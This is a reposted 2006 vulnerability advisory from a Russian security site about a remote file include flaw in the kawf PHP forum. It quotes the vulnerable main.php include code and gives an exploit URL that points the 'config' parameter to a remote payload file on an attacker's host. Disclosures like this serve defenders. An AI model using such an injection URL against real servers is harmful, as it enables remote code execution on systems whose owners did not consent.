Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

  phpPowerCards 2.10 (txt.inc.
php) Remote Code Execution Vulnerability

  Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

  Active Bulletin Board v1.1 beta2 (doprofiledit.
asp) Remote User Pass Change

From:o0xxdark0o_(at)_msn.com <o0xxdark0o_(at)_msn.com>
Date:23 октября 2006 г.
Subject:kawf (config) Remote File Include

####################################################################
#       kawf (config)  Remote File Include
#--------------------------------------------------------------------------------
-------------
#       Kawf is a web forum written in PHP4 using MySQL
#        v. 1.0 and all below
#--------------------------------------------------------------------------------
------------
#       download :
#       http://sourceforge.net/projects/kawf
#--------------------------------------------------------------------------------
------------
#       see the bug file:
#       http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=re
quire

#--------------------------------------------------------------------------------
------------
#       bug in  :
#       main.php
#--------------------------------------------------------------------------------
------------
#code : { i wrote all code for str0ke :D :D } include in line 13 ::
#                                                       #
#                                                       /* First setup the path */
#                                                       $include_path = "$srcroot/include:$srcroot/user/account";
#                                                       if (isset($include_append))
#                                                         $include_path .= ":" . $include_append;
#
#                                                       $old_include_path = ini_get("include_path");
#                                                       if (!empty($old_include_path))
#                                                         $include_path .= ":" . $old_include_path;
#                                                       ini_set("include_p
ath", $include_path);
#
#                                                       include_once("$con
fig.inc");
#                                                       require_once("sql.
inc");
#                                                       require_once("util
.inc");
#                                                       require_once("page
.inc");
#                                                       require_once("foru
muser.inc");
#
#                                                       sql_open($database)
;
#
#                                                       include("index.
php");
#
#                                                       sql_close();
#                                                       ?>
#--------------------------------------------------------------------------------
------------
#       exploit:
#          kawf/user/account/main.php?config=ss="fixed">http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#                                          or
#         (path)/main.php?config=ss="fixed">http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#--------------------------------------------------------------------------
#       greetz :  str0ke ,  c0ldz3r0 ,  all members in  xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D
#      inter_vieri_21 dont play runescape :d :d
#-------------------------------------------------------------------------
#      by o0xxdark0o
# i think... so that... i m here
#  [email protected]
####################################################################

# milw0rm.com [2006-10-21]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород